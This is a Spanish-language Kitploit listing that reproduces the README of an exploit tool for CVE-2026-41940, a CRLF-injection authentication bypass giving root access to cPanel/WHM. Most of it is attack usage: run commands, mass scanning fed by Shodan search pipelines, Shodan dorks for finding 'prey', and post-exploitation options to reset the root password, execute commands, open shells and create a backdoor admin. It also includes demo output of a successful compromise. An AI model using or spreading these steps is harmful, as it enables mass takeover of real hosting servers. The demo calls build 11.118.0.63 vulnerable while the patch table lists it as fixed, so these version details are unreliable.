Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41940 — cPanel y WHM: Omisión de autenticación mediante inyección CRLF en archivos de sesión | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
Autenticación y AutorizaciónEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel y WHM: Omisión de autenticación mediante inyección CRLF en archivos de sesión

Ver Repositorio
1hace 10h 20mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 CVE-2026-41940 – Bypass de Autenticación en cPanel y WHM

cPanel

⚡ Root sin Autenticación – Inyección CRLF en Archivo de Sesión ⚡
“Un solo exploit para dominarlos a todos.”

Python License No deps CVSS


🧠 El Exploit en Resumen

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  Etapa 1  ──  Generar una cookie de sesión pre‑auth        │
│  Etapa 2  ──  Inyección CRLF vía cabecera `Authorization`  │
│  Etapa 3  ──  Disparar `do_token_denied` (raw → cache)     │
│  Etapa 4  ──  Verificar acceso root a WHM vía API JSON     │
└─────────────────────────────────────────────────────────────┘

💥 Resultado – Acceso root completo a WHM, sin necesidad de credenciales.


📜 Licencia

Este proyecto se publica bajo la Licencia MIT – siéntete libre de usarlo, modificarlo y distribuirlo, pero no seas malvado 😈.
Consulta el archivo LICENSE para más detalles.


🛠️ Instalación – Es Literalmente Una Línea

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

Cero dependencias – solo la biblioteca estándar de Python 3.
No necesitas pip, virtualenv ni nada de ese ruido.


🚀 Inicio Rápido – Ejecútalo Ahora

Objetivo único

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

Escaneo masivo desde archivo

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

Tubería desde la web (Shodan, subfinder, etc.)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 Opciones de Línea de Comandos (lo bueno)


💀 Arsenal de Post‑Explotación

Una vez que hayas comprometido el sistema, puedes:

  • 🔍 Listar todas las cuentas de cPanel – --action list
  • 🔑 Cambiar la contraseña de root – --action passwd --passwd "h4ck3d!"
  • 🖥️ Ejecutar comandos del sistema – --action cmd --cmd "id;whoami"
  • 📡 Shell interactivo – --action shell (terminal WHM completo)
  • 👤 Crear administrador de puerta trasera – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 Leer archivos (vía shell) – cat /etc/passwd
  • 📊 Recopilar información del servidor – --action info

🧪 Demo – Lo Que Verás

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  Configuración:
   Objetivos : 1
   Hilos     : 10
   Timeout   : 15s
   Acción    : solo escaneo

[10:23:15] [SCAN] Iniciando cadena de exploit de 4 etapas... https://192.168.1.100:2087
[10:23:15] [INFO] Hostname canónico descubierto: server.example.com
[10:23:15] [STEP] Etapa 1/4 — Generando sesión preauth...
[10:23:16] [  OK] Etapa1: sesión preauth = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Etapa 2/4 — Inyección CRLF vía cabecera Authorization...
[10:23:17] [  OK] Etapa2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Etapa 3/4 — Disparando gadget do_token_denied (raw→cache)...
[10:23:18] [  OK] Etapa3: HTTP 401 — gadget do_token_denied disparado
[10:23:18] [STEP] Etapa 4/4 — Verificando acceso root a WHM...
[10:23:18] [INFO] Etapa4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMADO — ¡Acceso root a WHM! (v11.118.0.63 — CONFIRMADO vulnerable)
[10:23:18] [PWND]   Token    : /cpsess1234567890
[10:23:18] [PWND]   Sesión   : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   Versión  : 11.118.0.63
[10:23:18] [PWND]   URL API  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — Escaneo Completado
  Tiempo: 3.2s  ·  Objetivos: 1

  1 OBJETIVO(S) VULNERABLE(S)

  [*] Objetivo  : https://192.168.1.100:2087
  [*] Versión   : 11.118.0.63
  [*] Token     : /cpsess1234567890
  [*] URL API   : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] Sesión    : 9a7f8e3d2c1b0a9f
  [*] Evidencia : {"version":"11.118.0.63",...}

🔎 Dorks de Shodan (encuentra a tu presa)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 Versiones Afectadas – Estado del Parche

Todas las versiones inferiores a estos builds son vulnerables.


🕵️‍♂️ Autor y Créditos

0xgh057r3c0n – investigador de seguridad, ingeniero inverso y adicto al café.
GitHub | Twitter


⚠️ Aviso Legal

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos.
El acceso no autorizado a sistemas informáticos es ilegal. El autor y los colaboradores no son responsables de ningún uso indebido o daño causado por este software.
Úsalo de forma responsable y obtén siempre permiso primero.


🌟 Soporte / Contribuciones

  • ¿Encontraste un error? Abre un issue.
  • ¿Quieres mejorar el código? Los PRs son bienvenidos.
  • ¿Te gustó la herramienta? ¡Dale una ⭐ en GitHub!

🔥 Hackea el planeta, pero mantente legal. 🔥

Descargar herramienta
FlagDescripción
-u, --urlURL de un solo objetivo (p. ej. https://host:2087)
-l, --listArchivo con una URL por línea
--hostnameSobrescribir el Host canónico (auto‑descubierto)
-t, --threadsHilos (predeterminado: 10)
--timeoutTiempo de espera en segundos (predeterminado: 15)
--rate-limitPausa entre objetivos (segundos)
--actionPost‑explotación: list, passwd, cmd, exec, info, version, shell, adduser
--passwdNueva contraseña de root (con --action passwd)
--cmdComando del sistema (con --action cmd/exec)
--new-userNuevo usuario de cPanel (con --action adduser)
--new-domainNuevo dominio de cPanel (con --action adduser)
-o, --outputGuardar resultados en JSON
RamaBuild ParcheadoEstado
11.11011.110.0.97🛡️ Corregido
11.11811.118.0.63🛡️ Corregido
11.12611.126.0.54🛡️ Corregido
11.13211.132.0.29🛡️ Corregido
11.13411.134.0.20🛡️ Corregido
11.13611.136.0.5🛡️ Corregido